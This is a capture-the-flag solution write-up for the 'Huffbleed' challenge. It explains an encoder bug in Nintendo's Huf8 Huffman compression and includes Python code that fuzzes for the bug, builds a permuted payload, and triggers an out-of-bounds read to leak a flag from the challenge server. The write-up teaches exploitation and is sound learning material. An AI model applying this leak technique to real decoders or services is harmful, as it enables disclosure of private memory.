# Solution for Huffbleed

_This challenge is based on Nintendo's Huffman compression used in a significant number of GBA/DS games. It's surprisingly hard to find a good link now, but [here's one such decoder](https://github.com/Plombo/vcromclaim/blob/master/huf8.py) (noting that the header is slightly different to the one implemented in this challenge). Encoding it turns out to be non-trivial, and almost everyone gets it wrong, so why not make a pwn challenge out of it?_

Let's begin with a brief exposition into how Huffman codes work.

Normally every character takes up exactly 8 bits no matter how frequently it appears. Huffman codes are an optimal way of assigning (prefix-free) codes to these characters, so that more frequent characters require fewer bits to represent.

Here is an example taken from the [Wikipedia article](https://en.wikipedia.org/wiki/Huffman_coding) of a Huffman tree generated from the exact frequencies of the text `"this is an example of a huffman tree"`.

Huffman tree             |  Huffman codes
:-------------------------:|:-------------------------:
![tree](Huffman_tree_2.svg)  | ![codes](Huffman_tree_codes.png)

This 36-character string can now be represented using just 135 bits, compared to 288 (=8\*36) bits. This ignores the fact that we also need to store the tree structure itself, which is what we will talk about next.
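The bit count can be checked without building the tree explicitly: the encoded length equals the sum of the weights of all internal nodes created while merging, since each character's frequency is counted once per ancestor. A minimal sketch using Python's `heapq` (it ignores the cost of storing the tree, and `huffman_bits` is a hypothetical helper that assigns one bit per character in the degenerate single-symbol case):

```python
import heapq
from collections import Counter


def huffman_bits(text: str) -> int:
    """Total bits needed to Huffman-encode `text` (tree storage not included)."""
    heap = list(Counter(text).values())
    heapq.heapify(heap)
    if len(heap) == 1:
        return heap[0]  # degenerate case: one symbol, one bit per character
    total = 0
    while len(heap) > 1:
        # merge the two least frequent nodes; the new node's weight is added
        # once for every character underneath it, i.e. one more bit each
        merged = heapq.heappop(heap) + heapq.heappop(heap)
        total += merged
        heapq.heappush(heap, merged)
    return total


text = "this is an example of a huffman tree"
print(len(text), 8 * len(text), huffman_bits(text))  # → 36 288 135
```

Any valid Huffman tree for the same frequencies gives the same total, so tie-breaking does not affect the result.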

So the Huffman tree itself is not difficult to construct (again, see the Wikipedia article), but there are many different ways you might choose to encode its structure. For the Nintendo Huf8 compression used in this challenge, the tree is stored in exactly _2n_ bytes where _n_ is the number of unique characters (i.e. up to 256). Roughly speaking, half of these are the actual character values, and the other half are pointers from a node to its children.

You might imagine that you could place the non-leaf nodes (i.e. the blue ones above) into a linear array, and then point the left and right branches to their absolute index in the array. Since there are at most 255 such nodes, we can encode each child in 8 bits. What Huf8 does instead is encode the skip (or difference) between the current node and the child node, and hope that this fits in 6 bits. This is surprisingly non-trivial to do: BFS and DFS generally don't produce good enough labellings, but the greedy algorithm works well in 99.9% of cases.
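To make the node format concrete, here is a minimal sketch of one node byte under the conventions used by the Python reimplementation later in this writeup: the low 6 bits hold the offset, 0x40 marks a leaf left child, 0x80 marks a leaf right child, index 0 is the root, and child pairs sit at indices (1, 2), (3, 4), and so on. `pack_node` and `child_indices` are hypothetical helpers, and other Huf8 implementations may assign the two flag bits the other way round.

```python
def pack_node(offset: int, left_is_leaf: bool, right_is_leaf: bool) -> int:
    """Pack an internal node into one byte: 6-bit offset plus two leaf flags.

    The `% 64` models what happens when the offset does not fit: it wraps.
    """
    return (offset % 64) | (0x40 if left_is_leaf else 0) | (0x80 if right_is_leaf else 0)


def child_indices(i: int, node: int) -> tuple[int, int]:
    """Indices of the left/right children of the node byte stored at index i.

    Index 0 is the root; child pairs live at (1, 2), (3, 4), ... and the
    offset counts how many pairs to skip past the current node's own pair.
    """
    pair = (i + 1) // 2 + (node & 0x3F) + 1
    return 2 * pair - 1, 2 * pair


# A node that should skip 70 pairs silently skips 70 % 64 = 6 instead.
bad = pack_node(70, False, False)
print(bad, child_indices(0, bad))  # → 6 (13, 14)
```

The last line is the whole bug in miniature: nothing in the byte records that the offset was truncated, so the decoder walks into an unrelated pair of nodes.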

Here are some examples, noting that the [bandwidth](https://en.wikipedia.org/wiki/Graph_bandwidth) is defined as the largest skip of that particular labelling:
![bandwidth](huffbleedbw.png)
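To make the claim about BFS concrete, here is a minimal sketch (not part of the original solve) that lays out child pairs in plain BFS order and reports the largest offset any internal node needs. It assumes trees are nested tuples with integer leaves and that each internal node's two children occupy one pair slot; `balanced_tree` and `bfs_max_offset` are hypothetical helpers.

```python
from collections import deque


def balanced_tree(depth: int):
    """Perfectly balanced tree with 2**depth leaves; leaves are ints, nodes are tuples."""
    nodes = list(range(2 ** depth))
    while len(nodes) > 1:
        nodes = [(nodes[i], nodes[i + 1]) for i in range(0, len(nodes), 2)]
    return nodes[0]


def bfs_max_offset(root) -> int:
    """Give each internal node's child pair the next free slot in BFS order and
    return the largest offset (pairs skipped) that any node needs."""
    queue = deque([(root, 0)])  # (internal node, slot its own pair lives in); root = 0
    next_slot = 1
    worst = 0
    while queue:
        node, slot = queue.popleft()
        worst = max(worst, next_slot - slot - 1)
        for child in node:
            if isinstance(child, tuple):  # internal child: it lives in next_slot
                queue.append((child, next_slot))
        next_slot += 1
    return worst


print(bfs_max_offset(balanced_tree(7)))  # → 63
print(bfs_max_offset(balanced_tree(8)))  # → 127
```

Under these assumptions a balanced 128-leaf tree just fits in 6 bits (offset 63), but a balanced 256-leaf tree already needs an offset of 127, so plain BFS overflows even for a perfectly balanced tree.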

---

Now that we know a bit about Huffman codes, we can begin to discuss this challenge specifically. For a start, we want to find the 0.1% of cases that cause the bandwidth to exceed 64. The condition required for this is quite subtle, so it is much easier to fuzz for a payload that doesn't survive an encode-decode round trip. Taking random bytes from `/dev/random` or similar is not good enough: the data is uniformly distributed, so you basically get a balanced Huffman tree, which encodes very well under the greedy algorithm.

Instead, we will use 4096-byte windows of real files. We want something structured enough for its Huffman tree to be quite uneven (some very frequent characters and some very infrequent ones), but at the same time we want all 256 distinct characters to appear, to maximise the bandwidth. You can do this over every file on the filesystem, but executable binaries turn out to work quite well, and for this example we will use `mscorlib.dll` (attached to the repo).

```python
from pwn import *
from tqdm import trange

context.log_level = 'error'
mscorlib = open('mscorlib.dll', 'rb').read()

print(f'{len(mscorlib)=}')

# Slide a 4096-byte window backwards through the file in 1024-byte steps and
# stop at the first window that does not survive the encode-decode round trip
# (i.e. output lines 2 and 8 differ).
for start in trange((len(mscorlib) & -1024) - 4096, 0, -1024):
    with process('./huffbleed') as sh:
        initial_payload = mscorlib[start:start+4096]
        sh.send(initial_payload)
        arr = sh.recvall().decode().split('\n')
        if arr[2] != arr[8]:
            print(f'Found a suitable payload at {start=}')
            break
```

```
len(mscorlib)=5439480
 10%|███████▉                                                                        | 526/5307 [00:20<03:05, 25.83it/s]
Found a suitable payload at start=4895744
```
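The loop above spawns one process per window. Since we want windows containing all 256 byte values anyway, a cheap local pre-filter could skip hopeless windows before ever talking to the binary. This is a sketch of a hypothetical helper, `candidate_windows`, that is not part of the original solve:

```python
def candidate_windows(data: bytes, size: int = 4096, step: int = 1024):
    """Yield start offsets of `size`-byte windows containing all 256 byte values."""
    for start in range(0, len(data) - size + 1, step):
        if len(set(data[start:start + size])) == 256:
            yield start


# Toy check: 16 copies of bytes(range(256)) followed by 4096 zero bytes.
demo = bytes(range(256)) * 16 + bytes(4096)
print(list(candidate_windows(demo)))  # → [0, 1024, 2048, 3072]
```

In the solve script one could iterate over something like `reversed(list(candidate_windows(mscorlib)))` instead of the raw `trange`, which roughly preserves the original back-to-front scan order.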





Let's quickly look at the frequencies, more out of curiosity than for any actual analysis.

```python
from collections import Counter
counter = Counter(initial_payload)
assert len(counter) == 256  # every byte value appears at least once
print(counter)
```

```
Counter({230: 264, 231: 264, 232: 264, 233: 264, 234: 264, 235: 264, 229: 254, 236: 218, 0: 51, 48: 19, 1: 18, 7: 18, 6: 18, 5: 18, 9: 8, 10: 8, 11: 8, 12: 8, 13: 8, 14: 8, 15: 8, 16: 8, 17: 8, 18: 8, 19: 8, 20: 8, 21: 8, 22: 8, 23: 8, 24: 8, 25: 8, 26: 8, 27: 8, 28: 8, 29: 8, 30: 8, 31: 8, 32: 8, 33: 8, 34: 8, 35: 8, 36: 8, 37: 8, 38: 8, 39: 8, 40: 8, 41: 8, 42: 8, 43: 8, 44: 8, 45: 8, 46: 8, 47: 8, 49: 8, 50: 8, 51: 8, 52: 8, 53: 8, 54: 8, 55: 8, 56: 8, 57: 8, 58: 8, 59: 8, 60: 8, 61: 8, 62: 8, 63: 8, 64: 8, 65: 8, 66: 8, 67: 8, 68: 8, 69: 8, 70: 8, 71: 8, 72: 8, 73: 8, 74: 8, 75: 8, 76: 8, 77: 8, 78: 8, 79: 8, 80: 8, 81: 8, 82: 8, 83: 8, 84: 8, 85: 8, 86: 8, 87: 8, 88: 8, 89: 8, 90: 8, 91: 8, 92: 8, 93: 8, 94: 8, 95: 8, 96: 8, 97: 8, 98: 8, 99: 8, 100: 8, 101: 8, 102: 8, 103: 8, 104: 8, 105: 8, 106: 8, 107: 8, 108: 8, 109: 8, 110: 8, 111: 8, 112: 8, 113: 8, 114: 8, 115: 8, 116: 8, 117: 8, 118: 8, 119: 8, 120: 8, 121: 8, 122: 8, 123: 8, 124: 8, 125: 8, 126: 8, 127: 8, 128: 8, 129: 8,
```

At this point we more or less need to reimplement the encoder in Python, because each character now has two "encodings": one from the actual Huffman tree, and one that actually gets decoded. They differ because some of the `skip` offsets don't fit in 6 bits, so they wrap around modulo 64 and the decoder jumps to the wrong node. So let's reimplement the encoder and call the two encodings `byte2huff_part1` and `byte2huff_part2`.

```python
# Build the Huffman tree: repeatedly merge the two least frequent nodes.
dq = sorted(({'code':k,'freq':v} for k,v in counter.items()), key=lambda x:x['code'])
while (len(dq) > 1):
    dq.sort(key=lambda x:(x['freq']))
    right,left=dq.pop(0),dq.pop(0)
    new_item = {'left':left, 'right':right, 'freq':left['freq']+right['freq']}
    dq.append(new_item)

# build codes (part 1): the codes implied by the real Huffman tree
huff2byte_part1 = {}
byte2huff_part1 = {}
def build(child=dq[0], acc=''):
    if 'code' in child:
        code = child['code']
        byte2huff_part1[code] = acc
        huff2byte_part1[acc] = code
    else:
        build(child['left'], acc+'0')
        build(child['right'], acc+'1')
build()

bitLength = sum(len(byte2huff_part1[k]) * v for k,v in counter.items())
byteLength = (bitLength + 7) // 8
byteLength

# Lay out the tree greedily. For internal nodes, 'code' first holds the
# position of the pair the node lives in, and is then overwritten with the
# node byte that gets written out.
headerNodes = [dq[0]]
dq[0]['code'] = 0
while dq:
    # pick the queued node that minimises (position - queue index)
    bestIndex = 0
    for i in range(1, len(dq)):
        if (dq[i]['code'] - i < dq[bestIndex]['code'] - bestIndex):
            bestIndex = i

    bestNode = dq.pop(bestIndex)
    # 6-bit offset to the child pair; anything >= 64 wraps (the bug we exploit)
    newCode = (len(headerNodes) // 2 - bestNode['code']) % 64
    if 'left' not in bestNode['left']:   # left child is a leaf
        newCode += 0x40
    if 'left' not in bestNode['right']:  # right child is a leaf
        newCode += 0x80
    bestNode['code'] = newCode
    for child in [bestNode['left'], bestNode['right']]:
        headerNodes.append(child)
        if 'left' in child:
            child['code'] = len(headerNodes) // 2
            dq.append(child)

# build codes (part 2): walk the tree the way the decoder does, following the
# (possibly wrapped) offsets, so some leaves become reachable via several paths
huff2byte_part2 = {}
byte2huff_part2 = {}
def build2(i=0, acc='', isLeaf=False):
    code = headerNodes[i]['code']
    if isLeaf:
        huff2byte_part2[acc] = code
        byte2huff_part2.setdefault(code, []).append(acc)
    else:
        build2(2*((i+1)//2 + (code%64) + 1)-1, acc+'0', code&0x40)
        build2(2*((i+1)//2 + (code%64) + 1), acc+'1', code&0x80)
build2()
```

`byte2huff_part1` looks like this (all 256 characters have a unique mapping):

```python
for x in byte2huff_part1.items():
    print(x)
```

```
(0, '0000000')
(48, '00000010')
(7, '00000011')
(6, '00000100')
(5, '00000101')
(1, '00000110')
(240, '000001110')
(239, '000001111')
(238, '000010000')
(237, '000010001')
(209, '000010010')
(208, '000010011')
(207, '000010100')
(206, '000010101')
(205, '000010110')
(204, '000010111')
(203, '000011000')
(202, '000011001')
(201, '000011010')
(200, '000011011')
(199, '000011100')
(198, '000011101')
(197, '000011110')
(196, '000011111')
(235, '0001')
(234, '0010')
(233, '0011')
(232, '0100')
(231, '0101')
(230, '0110')
(195, '011100000')
(194, '011100001')
(193, '011100010')
(192, '011100011')
(191, '011100100')
(190, '011100101')
(189, '011100110')
(188, '011100111')
(187, '011101000')
(186, '011101001')
(185, '011101010')
(184, '011101011')
(183, '011101100')
(182, '011101101')
(181, '011101110')
(180, '011101111')
(179, '011110000')
(178, '011110001')
(177, '011110010')
(176, '011110011')
(175, '011110100')
(174, '011110101')
(173, '011110110')
(172, '011110111')
(171, '011111000')
(17
```

And `byte2huff_part2` looks like this (some characters have multiple Huffman codes leading to them, while others have none at all):

```python
for x in byte2huff_part2.items():
    print(x)
```

```
(192, ['0000000', '00000101', '011100001', '011100011', '011100100', '011100101', '011111000', '011111100', '101010100', '101010101', '101100100', '101101100', '101101101', '111000100', '111001100', '111001101', '111010100', '111010101', '111011000', '111011001'])
(1, ['00000010', '00000100', '00000110'])
(0, ['000000110', '000000111', '000001110', '000001111', '110110100', '110110101', '111000001'])
(205, ['000010000', '000010010', '000010100', '000010110'])
(204, ['000010001', '000010011', '000010101', '000010111'])
(199, ['000011000', '000011100'])
(198, ['000011001', '000011101'])
(201, ['000011010'])
(200, ['000011011'])
(197, ['000011110'])
(196, ['000011111'])
(235, ['0001'])
(234, ['0010'])
(233, ['0011'])
(232, ['0100'])
(231, ['0101'])
(230, ['0110'])
(193, ['011100000', '011100010'])
(189, ['011100110'])
(188, ['011100111'])
(187, ['011101000'])
(186, ['011101001'])
(185, ['011101010'])
(184, ['011101011'])
(183, ['011101100'])
(182, ['011101101'])
(181, ['011101110'])
(180,
```

In fact, you can end up with more than 256 distinct Huffman codes this way:

```python
sum(map(len, byte2huff_part2.values()))
```

```
273
```

Anyway, with that out of the way, let's focus on the actual pwn challenge. In the intended solution nothing actually crashes; instead, we leak the flag. This is helped by the fact that the flag is located just 62 bytes past the end of `cmpBuffer` (and is at most 32 bytes long), so if we can leak 94 bytes past the end we are done. Here's what the `bss` section looks like:
![bss](huffbleed_bss.png)

The trick now is that any permutation of our `initial_payload` results in the same Huffman tree (the tree only depends on the byte frequencies), and thus the same set of bad encodings. However, permuting it _does_ change the actual bits that get read, so the idea is to permute our payload in such a way that, upon reaching the end of `cmpBuffer`, we've decoded as few bytes as possible. Since the decoder is forced to produce exactly 4096 bytes, it then keeps reading past the end and into the flag. What we get back is a "decoded" version of the flag, which we can re-encode (albeit non-uniquely) to recover the flag. So here goes!
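First, a toy model of why the order matters. This is a sketch with made-up three-symbol tables standing in for `byte2huff_part1` and `huff2byte_part2` (`ENCODE`, `DECODE`, `count_decoded` and `bits_for` are all hypothetical): the multiset of encoder codes, and hence the total number of bits, is fixed, but the number of symbols a mismatched decoder produces from those bits depends on the order.

```python
from itertools import permutations

# Hypothetical toy tables, not the challenge's real ones.
ENCODE = {'A': '0', 'B': '10', 'C': '11'}  # codes the encoder writes
DECODE = {'00': 'a', '01': 'b', '1': 'c'}  # (mismatched) codes the decoder reads


def count_decoded(bits: str) -> tuple[int, int]:
    """Greedily decode `bits` with DECODE; return (symbols decoded, leftover bits)."""
    count, i = 0, 0
    while True:
        for j in range(i + 1, len(bits) + 1):
            if bits[i:j] in DECODE:
                count, i = count + 1, j
                break
        else:  # no prefix of the remaining bits is a code
            return count, len(bits) - i


def bits_for(order) -> str:
    """Concatenate the encoder's codes for the symbols in `order`."""
    return ''.join(ENCODE[c] for c in order)


print(count_decoded(bits_for('AABC')))  # → (4, 0)
print(count_decoded(bits_for('ACAB')))  # → (3, 1)
print(min(count_decoded(bits_for(p)) for p in set(permutations('AABC'))))  # → (3, 1)
```

Minimising the decoded count is the same objective the real search pursues; it just uses randomly sampled chunks instead of brute force, because 4096! orderings are out of reach.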

```python
from random import seed, sample
seed(0) # just to make it reproducible

def get_single_part2(bits):
    """Length of the first decoder (part 2) code that prefixes `bits`, or None."""
    for i in range(len(bits) + 1):
        if bits[:i] in huff2byte_part2:
            return i
    return None

def get_many_part2(codes, init):
    """Decode init + codes with the decoder's table.

    Returns (bytes decoded, leftover bits, the codes that were tried)."""
    count = 0
    orig = tuple(codes)
    bits = init + ''.join(codes)
    while True:
        tmp = get_single_part2(bits)
        if tmp is None:
            return count, len(bits), orig
        bits = bits[tmp:]
        count += 1

# Part 1 (real tree) codes for every byte of the payload
running_list = [byte2huff_part1[b] for b in initial_payload]
running_init = ''   # leftover bits not yet consumed by the decoder
running_count = 0   # bytes decoded so far
winner = []
# Build the payload 16 bytes at a time: try 64 random draws of 16 remaining
# codes and keep the draw that decodes into the fewest bytes.
for _ in range(256):
    best = min(get_many_part2(sample(running_list,16), running_init) for _ in range(64))
    running_count += best[0]
    for item in best[2]:
        running_list.remove(item)
    winner += [huff2byte_part1[b] for b in best[2]]
    # carry the undecoded tail bits over to the next chunk
    running_init = ''.join(best[2])[::-1][:best[1]][::-1]

print(f'total_so_far: {running_count} in {4096-len(running_list)}')

final_payload = bytes(winner)
assert len(final_payload) == 4096
with open('huffbleed_final_payload.bin', 'wb') as fo:
    fo.write(final_payload)
```

```
total_so_far: 3668 in 4096
```


So we have successfully rearranged the payload so that the whole of `cmpBuffer` decodes into just 3668 bytes. Since the decoder doesn't stop until it has produced exactly 4096 bytes, it keeps reading _past_ the end of `cmpBuffer` into other territory: specifically, a bunch of `00`s and then the flag. Let's pass our `final_payload` to the remote and see what we get back.

```python
with remote('fun.chall.seetf.sg', 50006) as sh:
    sh.send(final_payload)
    output = sh.recvall()
output
```

```
b'Please feed me some data (up to 4096 bytes).\nSuccessfully read in 4096 bytes:\n 8b 14 ec e6 e6 0f e7 a2 e6 eb e9 e8 61 eb 52 ec a0 ec e7 eb df ce ec e7 e5 89 e6 e7 ec e6 db e6 ea ec e7 e7 bf 10 05 e8 e8 99 e8 82 ec e8 67 ea ea 39 95 eb e9 e7 e6 eb e5 e6 e6 4e e8 ea 87 e5 e8 44 ec a6 e9 ea 9a e9 e8 3c e7 02 8f ea ca 4b e6 72 ec 21 eb e7 07 e7 0f 71 eb ec b2 d0 e9 62 e9 1f 86 e7 ec e7 eb ea 17 a8 e5 eb e7 eb 33 82 ea 9a ec 4d e9 e5 56 ec 00 e5 e8 74 d9 e8 ea 8b 53 e6 eb ec ec e6 eb 78 68 ec 98 e5 e9 e7 ec ea ad e7 ea 39 e5 0a eb e6 aa ea e9 e7 e6 e6 e8 e6 ec 32 88 e7 96 e6 ec 63 e5 e5 e7 15 e7 ec 6e ea e5 f9 e5 e8 3e e5 d4 eb ec cb 98 bd e8 e6 e9 e5 e9 e5 8a e7 e6 e8 e9 7d 6b 03 eb e7 eb eb e6 4e a4 24 78 2f 31 e7 86 68 ea e7 e7 ad e6 eb f0 e7 e6 ec 7c e6 93 e8 e6 ea e9 e6 e8 a7 ec 51 a5 b8 e5 c7 06 97 e8 8e 38 ea 98 e1 88 13 e5 e8 eb e5 00 48 e9 e6 50 47 0a ea e7 e6 ea eb e6 e6 d5 e7 e8 25 32 e5 99 e9 4e e5 ea e5 e9 e9 e8 5b ea 95 e5 25 b1 ea e7 c5 58 07 ea ea e5 af ea 3e ec eb 9e eb
```

There's a bunch of `c0`s at the end which makes sense since `192` had `0000000` as an encoding. (Side note: many of the 192s come from the highest two bits being set to indicate leaves, and the lowest 6 bits indicating 0 skip. So they are tree pointers rather than "value 192"s.)

The stretch at the very end, where some data is hidden among the `c0`s, looks quite interesting. Let's narrow in on it.

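```python
# The decoded hex dump: skip the bytes that came from cmpBuffer itself and
# trim the c0 padding around the leaked data.
dec = output.decode().split('\n')[-3]
dec_content = bytes.fromhex(dec)[running_count:].strip(b'\xc0')
dec_content
```

```
b'\xe6\xe7\xe7\xeb\xe7\xeb\xe6\xec\xe8\xec\x01\xe7\xb4W\xe5\xe6\xe7p+\x13\xe6n\xec\xe8\xea\xe5\xeb|\xe6\xb7\xe5\xec]\xe5\xebhj\xe8\xea\xe7\xec'
```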

Alright, let's re-encode this! Each byte may have one or more Huffman codes, and the choice affects the bit alignment of everything after it, so we take the product over all of them.

```python
from functools import reduce
from itertools import product
from Crypto.Util.number import long_to_bytes

# Each leaked byte may have several part-2 codes; try every combination.
list_of_lists = [byte2huff_part2[b] for b in dec_content]
print(f'There are {reduce(lambda x,y:x*y,[len(x) for x in list_of_lists])} possibilities to search through.')
concats = [''.join(x) for x in product(*list_of_lists)]

candidates = []
for bits in concats:
    # Reverse the bit string (dropping its first bit), read it as an integer,
    # then reverse the bytes: this packs the bits LSB-first into bytes.
    bar = long_to_bytes(int(bits[:0:-1], 2))[::-1]
    if all(b == 0 or 32 <= b < 127 for b in bar):
        candidates.append(bar)
print(f'Out of these, there are {len(candidates)} ASCII candidates:')
candidates
```

```
There are 768 possibilities to search through.
Out of these, there are 128 ASCII candidates:

[b'SEE{y u_bL3w_iY_h0Es3_d0wN!}',
 b'SEE{y u_bL3w_iY_h0Es3_l0wN!}',
 b'SEE{y u_bL3w_iY_h0es3_d0wN!}',
 b'SEE{y u_bL3w_iY_h0es3_l0wN!}',
 b'SEE{y u_bL3w_iY_h0Us3_d0wN!}',
 b'SEE{y u_bL3w_iY_h0Us3_l0wN!}',
 b'SEE{y u_bL3w_iY_h0us3_d0wN!}',
 b'SEE{y u_bL3w_iY_h0us3_l0wN!}',
 b'SEE{y u_bL3w_mY_h0Es3_d0wN!}',
 b'SEE{y u_bL3w_mY_h0Es3_l0wN!}',
 b'SEE{y u_bL3w_mY_h0es3_d0wN!}',
 b'SEE{y u_bL3w_mY_h0es3_l0wN!}',
 b'SEE{y u_bL3w_mY_h0Us3_d0wN!}',
 b'SEE{y u_bL3w_mY_h0Us3_l0wN!}',
 b'SEE{y u_bL3w_mY_h0us3_d0wN!}',
 b'SEE{y u_bL3w_mY_h0us3_l0wN!}',
 b'SEE{y u_bL3w_kY_h0Es3_d0wN!}',
 b'SEE{y u_bL3w_kY_h0Es3_l0wN!}',
 b'SEE{y u_bL3w_kY_h0es3_d0wN!}',
 b'SEE{y u_bL3w_kY_h0es3_l0wN!}',
 b'SEE{y u_bL3w_kY_h0Us3_d0wN!}',
 b'SEE{y u_bL3w_kY_h0Us3_l0wN!}',
 b'SEE{y u_bL3w_kY_h0us3_d0wN!}',
 b'SEE{y u_bL3w_kY_h0us3_l0wN!}',
 b'SEE{y u_bL3w_oY_h0Es3_d0wN!}',
 b'SEE{y u_bL3w_oY_h0Es3_l0wN!}',
 b'SEE{y u_bL3w_oY_h0es3_d0wN!}',
 b'SEE{y u_bL3w_oY_h0es3_l0wN!}',
 b'SEE{y u_bL3w_oY_h0Us3_d0wN!}',
 b'SEE{y u_bL3
```
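The re-encoding step relies on PyCryptodome's `long_to_bytes`. A dependency-free sketch of the same idea packs each combination's bits least-significant-bit first (the effect of the two reversals in the solve script) and keeps only printable results. It deliberately omits the one-bit offset used there (`str[:0:-1]` drops the first bit), strips only trailing zero bytes, and `pack_lsb_first` and `ascii_candidates` are hypothetical helpers:

```python
from itertools import product


def pack_lsb_first(bits: str) -> bytes:
    """Pack a '0'/'1' string into bytes, least significant bit first.

    A trailing partial byte is zero-padded in its high bits.
    """
    out = bytearray()
    for i in range(0, len(bits), 8):
        chunk = bits[i:i + 8]
        out.append(sum(1 << k for k, b in enumerate(chunk) if b == '1'))
    return bytes(out)


def ascii_candidates(options: list[list[str]]) -> list[bytes]:
    """Try every combination of per-byte codes; keep the printable results."""
    found = []
    for choice in product(*options):
        data = pack_lsb_first(''.join(choice)).rstrip(b'\x00')
        if all(32 <= b < 127 for b in data):
            found.append(data)
    return found


# 'S' is 0x53 -> bits LSB first '11001010'; 'E' is 0x45 -> '10100010'.
print(ascii_candidates([['11001010'], ['10100010', '11111111']]))  # → [b'SE']
```

With the real data, `options` would be `[byte2huff_part2[b] for b in dec_content]`, plus whatever bit offset the leaked stream actually starts at.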

The exact candidate set you get will likely differ depending on your exact payload; you could also intersect it with the candidate set from a different payload. In any case, only four reasonable-looking flags come out of this list, all of the form `SEE{y0u_[bf]L3w_mY_h0[uU]s3_d0wN!}`, so it is feasible to just try all four.

The intended flag is `SEE{y0u_bL3w_mY_h0us3_d0wN!}`.